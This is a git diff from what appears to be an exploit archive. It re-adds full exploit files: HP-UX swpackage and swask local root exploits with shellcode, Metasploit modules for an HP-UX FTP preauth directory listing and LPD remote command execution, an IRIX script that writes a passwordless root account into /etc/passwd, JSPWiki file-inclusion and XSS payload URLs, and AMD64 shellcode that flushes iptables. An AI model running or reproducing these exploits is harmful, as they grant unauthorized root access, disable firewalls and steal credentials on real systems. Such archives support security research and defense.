@@ -34,6 +34,6 @@ crontab -e 2> /tmp/crontab$$ grep -v "error on previous line" /tmp/crontab$$ rm -f /tmp/crontab_exp /tmp/crontab$$ - - -# milw0rm.com [2000-11-19] + + +# milw0rm.com [2000-11-19] diff --git a/platforms/hp-ux/dos/212.c b/platforms/hp-ux/dos/212.c index b2f7b068a..3a0303a0c 100755 --- a/platforms/hp-ux/dos/212.c +++ b/platforms/hp-ux/dos/212.c @@ -38,6 +38,6 @@ char **argv; exit(0); } - - -// milw0rm.com [2000-12-01] + + +// milw0rm.com [2000-12-01] diff --git a/platforms/hp-ux/local/134.c b/platforms/hp-ux/local/134.c index 82d929e52..d0ed64a15 100755 --- a/platforms/hp-ux/local/134.c +++ b/platforms/hp-ux/local/134.c @@ -98,6 +98,6 @@ int argc;char ** argv;char **env; printf("¼ÇµÃɾ³ýÕâ¸öÁÙʱÎļþ(Remember to delete the file): /tmp/.ex.cat .\n"); execl("/usr/bin/ct","/usr/bin/ct","abc_",0); /* ºÃÏ·¿ªÊ¼ÁË £º£© */ } - - -// milw0rm.com [2003-12-16] + + +// milw0rm.com [2003-12-16] diff --git a/platforms/hp-ux/local/199.c b/platforms/hp-ux/local/199.c index 954520dbf..4bb03c71e 100755 --- a/platforms/hp-ux/local/199.c +++ b/platforms/hp-ux/local/199.c @@ -70,6 +70,6 @@ int main(int argc, char *argv[]) perror("execl failed"); return(-1); } - - -// milw0rm.com [2000-11-20] + + +// milw0rm.com [2000-11-20] diff --git a/platforms/hp-ux/local/245.c b/platforms/hp-ux/local/245.c index 445df5a09..8762c19f6 100755 --- a/platforms/hp-ux/local/245.c +++ b/platforms/hp-ux/local/245.c @@ -46,6 +46,6 @@ main(int argc , char **argv){ execl("/bin/cu","cu","-l",buffer,0); } - - -// milw0rm.com [2001-01-13] + + +// milw0rm.com [2001-01-13] diff --git a/platforms/hp-ux/local/2633.c b/platforms/hp-ux/local/2633.c index 2383d6fde..ebb9f06ce 100755 --- a/platforms/hp-ux/local/2633.c +++ b/platforms/hp-ux/local/2633.c 
@@ -1,56 +1,56 @@ -/* HP-UX swpackage buffer overflow exploit - * ======================================= - * HP-UX 'swpackage' contains an exploitable stack overflow - * in the handling of command line arguements. Specifically the - * problem occurs due to insufficent bounds checking in the "-S" - * optional arguement. 'swpackage' is installed setuid root by - * default in HP-UX and allows for local root compromise when - * exploiting this issue. - * - * Example. - * $ cc prdelka-vs-HPUX-swpackage.c -o prdelka-vs-HPUX-swpackage - * /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file - * (prdelka-vs-HPUX-swpackage.o) was detected. The linked output may - * not run on a PA 1.x system. - * $ uname -a - * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license - * $ id - * uid=102(user) gid=20(users) - * $ ls -al /usr/sbin/swpackage - * -r-sr-xr-x 2 root bin 1323008 Nov 3 2003 /usr/sbin/swpackage - * $ ./prdelka-vs-HPUX-swpackage - * [ HP-UX 11i 'swpackage' local root exploit - * $ id - * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) - * - * - prdelka - */ - -char shellcode[]= - "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" - "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" - "\xb4\x16\x70\x16""/bin/sh"; - -int main(){ - char adr[4],*b,*a,*c,*envp[1]; - int i; - *(unsigned long*)adr=0x7f7f0434; - printf("[ HP-UX 11i 'swpackage' local root exploit\n"); - b=(char*)malloc(2048); - a=b; - memset(b,0,2048); - memset(b,'a',1053); - b+=1053; - for(i=0;i<4;i++) *b++=adr[i%4]; - c=(char*)malloc(2048); - b=c; - memset(c,0,2048); - sprintf(c,"PATH="); - b+=5; - for(i=0;i - * - * ======= 01/20/06 10:19:50 EST END swask SESSION (non-interactive) - * - * $ id - * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) - * $ - * - * - prdelka - */ - -char shellcode[]= - "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" - "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" - "\xb4\x16\x70\x16""/bin/sh"; - -int main(){ - char *d, *c, *b,*a,*envp; - int i,pid; 
- printf("[ HP-UX 11i 'swask' local root exploit\n"); - switch(pid = fork()){ - case -1: - perror("fork"); - case 0: - a=(char*)malloc(2048); - memset(a,0,2048); - sprintf(a,"AAAAA%c%c%c%c",0x7a,0xec,0x44,0x38); - for(i=0;i<103;i++) strcat(a,"%p"); - envp=0; - execle("/usr/sbin/swask","swask","-s",a,0,envp); - break; - default: - sleep(1); - b=(char*)malloc(2048); - memset(b,0,2048); - for(i=0;i<102;i++) strcat(b,"%p"); - strcat(b,"%31799u%hn"); - a=(char*)malloc(2048); - memset(a,0,2048); - d=a; - for(i=0;i<39;i++)strcat(a,"A"); - d+=39; - for(i=0;i + * + * ======= 01/20/06 10:19:50 EST END swask SESSION (non-interactive) + * + * $ id + * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) + * $ + * + * - prdelka + */ + +char shellcode[]= + "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" + "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" + "\xb4\x16\x70\x16""/bin/sh"; + +int main(){ + char *d, *c, *b,*a,*envp; + int i,pid; + printf("[ HP-UX 11i 'swask' local root exploit\n"); + switch(pid = fork()){ + case -1: + perror("fork"); + case 0: + a=(char*)malloc(2048); + memset(a,0,2048); + sprintf(a,"AAAAA%c%c%c%c",0x7a,0xec,0x44,0x38); + for(i=0;i<103;i++) strcat(a,"%p"); + envp=0; + execle("/usr/sbin/swask","swask","-s",a,0,envp); + break; + default: + sleep(1); + b=(char*)malloc(2048); + memset(b,0,2048); + for(i=0;i<102;i++) strcat(b,"%p"); + strcat(b,"%31799u%hn"); + a=(char*)malloc(2048); + memset(a,0,2048); + d=a; + for(i=0;i<39;i++)strcat(a,"A"); + d+=39; + for(i=0;i 'HP-UX FTP Server Preauthentication Directory Listing', - 'Version' => '$Revision: 1.8 $', - 'Authors' => [ 'Optyx '], - 'Arch' => [ ], - 'OS' => [ 'hpux' ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The FTP server port', 21], - 'RPATH' => [1, 'DATA', 'The path name to list', "/"], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This exploit abuses an unpublished vulnerability in the HP-UX FTP - service. 
This flaw allows an unauthenticated remote user to obtain - directory listings from this server with the privileges of the root - user. This vulnerability was silently patched by HP sometime between - 2001 and 2003. -}), - 'Refs' => - [ - # None - ], - - 'Keys' => ['ftp'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_path = $self->GetVar('RPATH'); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - my $l = IO::Socket::INET->new - ( - Proto => 'tcp', - Listen => 5, - Blocking => 0, - ReuseAddr => 1, - ); - - my $r; - my $prt = ",".int($l->sockport / 256).",".int($l->sockport % 256); - my $sel = IO::Select->new($l); - my $cmd = "PORT ".join(",", split(/\./,Pex::InternetIP($target_host))).$prt."\r\n"; - - $r .= $s->Recv(-1, 5); - - $s->Send($cmd); - $r .= $s->Recv(-1, 5); - - $s->Send("LIST $target_path\r\n"); - $r .= $s->Recv(-1, 5); - $s->Close; - - foreach (split(/\n/, $r)) { - chomp; - $self->PrintLine("[*] $_"); - } - - my @rdy = $sel->can_read(3); - if (scalar(@rdy)) { - my $x = $l->accept(); - $self->PrintLine("[*] Accepted connection from ".$x->sockhost.":".$x->sockport); - - while (<$x>) { - chomp; - $self->PrintLine($_); - } - $x->shutdown(2); - $x->close; - } - $l->shutdown(2); - $l->close; - return; -} - -# milw0rm.com [2005-10-19] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. 
In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::hpux_ftpd_preauth_list; +use base "Msf::Exploit"; +use IO::Socket; +use IO::Select; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'HP-UX FTP Server Preauthentication Directory Listing', + 'Version' => '$Revision: 1.8 $', + 'Authors' => [ 'Optyx '], + 'Arch' => [ ], + 'OS' => [ 'hpux' ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The FTP server port', 21], + 'RPATH' => [1, 'DATA', 'The path name to list', "/"], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This exploit abuses an unpublished vulnerability in the HP-UX FTP + service. This flaw allows an unauthenticated remote user to obtain + directory listings from this server with the privileges of the root + user. This vulnerability was silently patched by HP sometime between + 2001 and 2003. +}), + 'Refs' => + [ + # None + ], + + 'Keys' => ['ftp'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_path = $self->GetVar('RPATH'); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); + return; + } + + my $l = IO::Socket::INET->new + ( + Proto => 'tcp', + Listen => 5, + Blocking => 0, + ReuseAddr => 1, + ); + + my $r; + my $prt = ",".int($l->sockport / 256).",".int($l->sockport % 256); + my $sel = IO::Select->new($l); + my $cmd = "PORT ".join(",", split(/\./,Pex::InternetIP($target_host))).$prt."\r\n"; + + $r .= $s->Recv(-1, 5); + + $s->Send($cmd); + $r .= $s->Recv(-1, 5); + + $s->Send("LIST $target_path\r\n"); + $r .= $s->Recv(-1, 5); + $s->Close; + + foreach (split(/\n/, $r)) { + chomp; + $self->PrintLine("[*] $_"); + } + + my @rdy = $sel->can_read(3); + if (scalar(@rdy)) { + my $x = $l->accept(); + $self->PrintLine("[*] Accepted connection from ".$x->sockhost.":".$x->sockport); + + while (<$x>) { + chomp; + $self->PrintLine($_); + } + $x->shutdown(2); + $x->close; + } + $l->shutdown(2); + $l->close; + return; +} + +# milw0rm.com [2005-10-19] diff --git a/platforms/hp-ux/remote/1261.pm b/platforms/hp-ux/remote/1261.pm index 285b2af92..5ecd8b3e8 100755 --- a/platforms/hp-ux/remote/1261.pm +++ b/platforms/hp-ux/remote/1261.pm 
@@ -1,108 +1,108 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::hpux_lpd_exec; -use base "Msf::Exploit"; -use IO::Socket; -use IO::Select; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'HP-UX LPD Command Execution', - 'Version' => '$Revision: 1.13 $', - 'Authors' => [ 'H D Moore '], - 'Arch' => [ ], - 'OS' => [ 'hpux' ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The LPD server port', 515], - }, - 'Payload' => - { - 'Space' => 200, - 'Keys' => ['cmd_nospaceslash'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This exploit abuses an unpublished vulnerability in the HP-UX LPD - service. This flaw allows an unauthenticated attacker to execute - arbitrary commands with the privileges of the root user. The LPD - service is only exploitable when the address of the attacking system - can be resolved by the target. This vulnerability was silently patched - with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213. 
-}), - 'Refs' => [ - ['URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'] - ], - - 'Keys' => ['lpd'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_path = $self->GetVar('RPATH'); - my $cmd = $self->GetVar('EncodedPayload')->RawPayload; - - my $res; - - # We use a second connection to exploit the bug - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - srand(time() + $$); - my $num = int(rand() * 1000); - - $s->Send("\x02msf$num`$cmd`\n"); - $res = $s->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our second job request command"); - $s->Close; - return; - } - - $s->Send("\x02 32 cfA187control\n"); - $res = $s->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our control file"); - $s->Close; - return; - } - - $self->PrintLine("[*] Remember to kill the telnet process when finished"); - $self->PrintLine("[*] Forcing an error and hijacking the cleanup routine..."); - $s->Send(Pex::Text::AlphaNumText(16384)); - $s->Close; - - return; -} - -# milw0rm.com [2005-10-19] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. 
+## + +package Msf::Exploit::hpux_lpd_exec; +use base "Msf::Exploit"; +use IO::Socket; +use IO::Select; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'HP-UX LPD Command Execution', + 'Version' => '$Revision: 1.13 $', + 'Authors' => [ 'H D Moore '], + 'Arch' => [ ], + 'OS' => [ 'hpux' ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The LPD server port', 515], + }, + 'Payload' => + { + 'Space' => 200, + 'Keys' => ['cmd_nospaceslash'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This exploit abuses an unpublished vulnerability in the HP-UX LPD + service. This flaw allows an unauthenticated attacker to execute + arbitrary commands with the privileges of the root user. The LPD + service is only exploitable when the address of the attacking system + can be resolved by the target. This vulnerability was silently patched + with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213. +}), + 'Refs' => [ + ['URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'] + ], + + 'Keys' => ['lpd'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_path = $self->GetVar('RPATH'); + my $cmd = $self->GetVar('EncodedPayload')->RawPayload; + + my $res; + + # We use a second connection to exploit the bug + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); + return; + } + + srand(time() + $$); + my $num = int(rand() * 1000); + + $s->Send("\x02msf$num`$cmd`\n"); + $res = $s->Recv(1, 5); + if (ord($res) != 0) { + $self->PrintLine("[*] The target did not accept our second job request command"); + $s->Close; + return; + } + + $s->Send("\x02 32 cfA187control\n"); + $res = $s->Recv(1, 5); + if (ord($res) != 0) { + $self->PrintLine("[*] The target did not accept our control file"); + $s->Close; + return; + } + + $self->PrintLine("[*] Remember to kill the telnet process when finished"); + $self->PrintLine("[*] Forcing an error and hijacking the cleanup routine..."); + $s->Send(Pex::Text::AlphaNumText(16384)); + $s->Close; + + return; +} + +# milw0rm.com [2005-10-19] diff --git a/platforms/hp-ux/remote/977.c b/platforms/hp-ux/remote/977.c index 22267fd89..5bc093e85 100755 --- a/platforms/hp-ux/remote/977.c +++ b/platforms/hp-ux/remote/977.c @@ -92,6 +92,6 @@ if(check != NULL) { printf("Got root hash\n"); } -} - -// milw0rm.com [2005-05-03] +} + +// milw0rm.com [2005-05-03] diff --git a/platforms/hp-ux/shellcode/13295.txt b/platforms/hp-ux/shellcode/13295.txt index f58b0798d..6474d3b46 100755 --- a/platforms/hp-ux/shellcode/13295.txt +++ b/platforms/hp-ux/shellcode/13295.txt @@ -7,6 +7,6 @@ u_char shellcode[] = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" - "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"; - + "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"; + # milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/irix/local/1577.sh b/platforms/irix/local/1577.sh index 89acb2423..e0167fded 100755 --- a/platforms/irix/local/1577.sh +++ b/platforms/irix/local/1577.sh 
@@ -1,10 +1,10 @@ -#!/bin/sh -# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312 - -/usr/sysadm/bin/runpriv mountfs -s test -d / -o | - "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" -su r00t -c "chown root:sys /tmp/passwd123 ; -mv /tmp/passwd123 /etc/passwd ; -chmod 644 /etc/passwd ; su" - -# milw0rm.com [2005-10-10] +#!/bin/sh +# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312 + +/usr/sysadm/bin/runpriv mountfs -s test -d / -o | + "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" +su r00t -c "chown root:sys /tmp/passwd123 ; +mv /tmp/passwd123 /etc/passwd ; +chmod 644 /etc/passwd ; su" + +# milw0rm.com [2005-10-10] diff --git a/platforms/irix/local/265.sh b/platforms/irix/local/265.sh index 70a14fd9b..4fddd82ef 100755 --- a/platforms/irix/local/265.sh +++ b/platforms/irix/local/265.sh @@ -37,6 +37,6 @@ if [ ! -f "$LIBRARY.so" ] fi chmod 666 $LIBRARY.so -$EXECUTABLE -n ../../../../../$DIRECTORY/$FILE - -# milw0rm.com [2001-05-07] +$EXECUTABLE -n ../../../../../$DIRECTORY/$FILE + +# milw0rm.com [2001-05-07] diff --git a/platforms/irix/local/270.sh b/platforms/irix/local/270.sh index 66c100177..aa9d2fe3b 100755 --- a/platforms/irix/local/270.sh +++ b/platforms/irix/local/270.sh @@ -35,6 +35,6 @@ fi chmod 666 $LIBRARY.so $EXECUTABLE -n ../../../../$DIRECTORY/$LIBRARY -h localhost -p lalala bzz-zz - - -# milw0rm.com [2001-05-08] + + +# milw0rm.com [2001-05-08] diff --git a/platforms/irix/local/334.c b/platforms/irix/local/334.c index fdf78626e..566ba9b41 100755 --- a/platforms/irix/local/334.c +++ b/platforms/irix/local/334.c @@ -210,6 +210,6 @@ main(int argc, char *argv[]) { fflush(stdout); run(buf); -} - -// milw0rm.com [1997-05-25] +} + +// milw0rm.com [1997-05-25] diff --git a/platforms/irix/local/336.c b/platforms/irix/local/336.c index 27af00bf1..49da5e632 100755 --- a/platforms/irix/local/336.c +++ b/platforms/irix/local/336.c 
@@ -89,6 +89,6 @@ void main(int argc, char **argv) execle("/bin/login", "login", "-h", &buf[1], 0, env); perror("execl failed"); -} - -// milw0rm.com [1997-05-26] +} + +// milw0rm.com [1997-05-26] diff --git a/platforms/irix/local/337.c b/platforms/irix/local/337.c index e6482a211..2e7ce9760 100755 --- a/platforms/irix/local/337.c +++ b/platforms/irix/local/337.c @@ -112,6 +112,6 @@ void main(int argc, char **argv) execle("/usr/sbin/iwsh", "iwsh", "-xrm", &buf[2], 0, env); perror("execl failed"); } - - -// milw0rm.com [1997-05-27] + + +// milw0rm.com [1997-05-27] diff --git a/platforms/jsp/webapps/5112.txt b/platforms/jsp/webapps/5112.txt index 1256b72cd..9f1981cb1 100755 --- a/platforms/jsp/webapps/5112.txt +++ b/platforms/jsp/webapps/5112.txt 
@@ -1,56 +1,56 @@ -JSPWiki Multiple Vulnerabilities - - -Vendor: -Janne Jalkanen JSPWiki – http://www.jspwiki.org - -Application Description: -From JSPWiki website - “JSPWiki is a feature-rich and extensible WikiWiki engine built around a standart J2EE components (Java, servlets, JSP).” - -Tested versions: -JSPWiki v2.4.104 -JSPWiki v2.5.139 -Earlier versions may also be affected. - -JSPWiki Local .jsp File Inclusion Vulnerability. -An input validation problem exists within JSPWiki which allows to execute (include) arbitrary local .jsp files. An attacker may leverage this issue to execute arbitrary server-side script code on a vulnerable server with the privileges of the web server process. - -Example (including rss.jsp file from the application root directory): -http://server/JSPWikiPath/Edit.jsp?page=Main&editor=../../../rss - -Note: page parameter must be an existing page on the server. - -This grants an attacker unauthorized access to sensitive .jsp files on the server and can lead to information disclosure. - -Examples: -http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../Install -http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../admin/SecurityConfig - -The first example disclose sensitive information such as the full path of the application on the server, page (and attachments) storage path, log files and work directory by including the application installation (Install.jsp). -The second example disclose the application security configurations by including the JSPWiki Security Configuration Verifier file (admin/SecurityConfig.jsp). - -In addition, JSPWiki allow users to upload (attach) files to entry pages. An attacker can use the information disclosed by the installation file to upload a malicious .jsp file and locally execute it. -By executing malicious server-side code, an attacker may be able to compromise the server. - - -JSPWiki Cross-Site Scripting Vulnerability. 
-An attacker may leverage cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. - -Example: -http://server/JSPWikiPath/Edit.jsp?page=Main&editor=%3Cscript%3Ealert(document.cookie)%3C/script%3E - -Original Document: -http://www.bugsec.com/articles.php?Security=48&Web-Application-Firewall=0 - -Download PDF: -http://www.bugsec.com/up_files/JSPWiki_Multiple_Vulnerabilities.pdf - -Credit: -Moshe BA -BugSec LTD. - Security Consulting Company -Tel: +972-3-9622655 -Fax: +972-3-9511433 -Email: Info -at- BugSec -d0t- com -http://www.bugsec.com - -# milw0rm.com [2008-02-13] +JSPWiki Multiple Vulnerabilities + + +Vendor: +Janne Jalkanen JSPWiki – http://www.jspwiki.org + +Application Description: +From JSPWiki website - “JSPWiki is a feature-rich and extensible WikiWiki engine built around a standart J2EE components (Java, servlets, JSP).” + +Tested versions: +JSPWiki v2.4.104 +JSPWiki v2.5.139 +Earlier versions may also be affected. + +JSPWiki Local .jsp File Inclusion Vulnerability. +An input validation problem exists within JSPWiki which allows to execute (include) arbitrary local .jsp files. An attacker may leverage this issue to execute arbitrary server-side script code on a vulnerable server with the privileges of the web server process. + +Example (including rss.jsp file from the application root directory): +http://server/JSPWikiPath/Edit.jsp?page=Main&editor=../../../rss + +Note: page parameter must be an existing page on the server. + +This grants an attacker unauthorized access to sensitive .jsp files on the server and can lead to information disclosure. 
+ +Examples: +http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../Install +http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../admin/SecurityConfig + +The first example disclose sensitive information such as the full path of the application on the server, page (and attachments) storage path, log files and work directory by including the application installation (Install.jsp). +The second example disclose the application security configurations by including the JSPWiki Security Configuration Verifier file (admin/SecurityConfig.jsp). + +In addition, JSPWiki allow users to upload (attach) files to entry pages. An attacker can use the information disclosed by the installation file to upload a malicious .jsp file and locally execute it. +By executing malicious server-side code, an attacker may be able to compromise the server. + + +JSPWiki Cross-Site Scripting Vulnerability. +An attacker may leverage cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. + +Example: +http://server/JSPWikiPath/Edit.jsp?page=Main&editor=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +Original Document: +http://www.bugsec.com/articles.php?Security=48&Web-Application-Firewall=0 + +Download PDF: +http://www.bugsec.com/up_files/JSPWiki_Multiple_Vulnerabilities.pdf + +Credit: +Moshe BA +BugSec LTD. - Security Consulting Company +Tel: +972-3-9622655 +Fax: +972-3-9511433 +Email: Info -at- BugSec -d0t- com +http://www.bugsec.com + +# milw0rm.com [2008-02-13] diff --git a/platforms/lin_amd64/shellcode/13296.c b/platforms/lin_amd64/shellcode/13296.c index 114fb7420..cca69989e 100755 --- a/platforms/lin_amd64/shellcode/13296.c +++ b/platforms/lin_amd64/shellcode/13296.c 
@@ -1,85 +1,85 @@ -/* - -/sbin/iptables -F shellcode for AMD64 (84 bytes) - -By gat3way - - -The code to load the sc[] into an executable mmap()-ed executable page -was shamelessly stolen by hophet (too lazy :)) -Thanks Gustavo C. for the inspiration - x86_64 assembly is fun :) - -# Here is the boring assembly code: -# push /sbin/iptables: - movq $0x73656c626174ffff, %rbx - shr $16, %rbx - push %rbx - movq $0x70692f6e6962732f, %rbx - push %rbx - movq %rsp, %rdi -# push params - movq $0x462dffffffffffff,%rbx - shr $48, %rbx - push %rbx - movq %rsp, %rcx - movq $0x46ffffffffffffff,%rbx - shr $56, %rbx - push %rbx - movq %rsp, %rax - xor %rbx, %rbx - push %rbx - push %rcx - push %rax - movq %rsp,%rsi - movq %rsp,%rdx -# execve - xorq %rax,%rax - mov $0x3b,%al - syscall - - -Hm...pak ne moga da izmislia neshto umno :( - -*/ - - - -#include -#include -#include -#include -#include -#include -#include -#include - - -char sc[]="\x48\xbb\xff\xff" -"\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73\x62" -"\x69\x6e\x2f\x69\x70\x53\x48\x89\xe7\x48\xbb\xff\xff\xff\xff\xff" -"\xff\x2d\x46\x48\xc1\xeb\x30\x53\x48\x89\xe1\x48\xbb\xff\xff\xff" -"\xff\xff\xff\xff\x46\x48\xc1\xeb\x38\x53\x48\x89\xe0\x48\x31\xdb" -"\x53\x51\x50\x48\x89\xe6\x48\x89\xe2\x48\x31\xc0\xb0\x3b\x0f\x05"; - -void main() -{ - void (*p)(); - int fd; - - printf("Lenght: %d\n", strlen(sc)); - fd = open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); - if (fd < 0) - err(1, "open"); - - write(fd, sc, strlen(sc)); - if ((lseek(fd, 0L, SEEK_SET)) < 0) - err(1, "lseek"); - - p = (void (*)())mmap(NULL, strlen(sc), PROT_READ|PROT_EXEC, MAP_SHARED, fd, 0); - if (p == (void (*)())MAP_FAILED) - err(1, "mmap"); - p(); - return 0; -} - +/* + +/sbin/iptables -F shellcode for AMD64 (84 bytes) + +By gat3way + + +The code to load the sc[] into an executable mmap()-ed executable page +was shamelessly stolen by hophet (too lazy :)) +Thanks Gustavo C. 
for the inspiration - x86_64 assembly is fun :) + +# Here is the boring assembly code: +# push /sbin/iptables: + movq $0x73656c626174ffff, %rbx + shr $16, %rbx + push %rbx + movq $0x70692f6e6962732f, %rbx + push %rbx + movq %rsp, %rdi +# push params + movq $0x462dffffffffffff,%rbx + shr $48, %rbx + push %rbx + movq %rsp, %rcx + movq $0x46ffffffffffffff,%rbx + shr $56, %rbx + push %rbx + movq %rsp, %rax + xor %rbx, %rbx + push %rbx + push %rcx + push %rax + movq %rsp,%rsi + movq %rsp,%rdx +# execve + xorq %rax,%rax + mov $0x3b,%al + syscall + + +Hm...pak ne moga da izmislia neshto umno :( + +*/ + + + +#include +#include +#include +#include +#include +#include +#include +#include + + +char sc[]="\x48\xbb\xff\xff" +"\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73\x62" +"\x69\x6e\x2f\x69\x70\x53\x48\x89\xe7\x48\xbb\xff\xff\xff\xff\xff" +"\xff\x2d\x46\x48\xc1\xeb\x30\x53\x48\x89\xe1\x48\xbb\xff\xff\xff" +"\xff\xff\xff\xff\x46\x48\xc1\xeb\x38\x53\x48\x89\xe0\x48\x31\xdb" +"\x53\x51\x50\x48\x89\xe6\x48\x89\xe2\x48\x31\xc0\xb0\x3b\x0f\x05"; + +void main() +{ + void (*p)(); + int fd; + + printf("Lenght: %d\n", strlen(sc)); + fd = open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); + if (fd < 0) + err(1, "open"); + + write(fd, sc, strlen(sc)); + if ((lseek(fd, 0L, SEEK_SET)) < 0) + err(1, "lseek"); + + p = (void (*)())mmap(NULL, strlen(sc), PROT_READ|PROT_EXEC, MAP_SHARED, fd, 0); + if (p == (void (*)())MAP_FAILED) + err(1, "mmap"); + p(); + return 0; +} + // milw0rm.com [2008-11-28] \ No newline at end of file diff --git a/platforms/lin_amd64/shellcode/13297.c b/platforms/lin_amd64/shellcode/13297.c index 83eeb5504..fee66f5b6 100755 --- a/platforms/lin_amd64/shellcode/13297.c +++ b/platforms/lin_amd64/shellcode/13297.c 
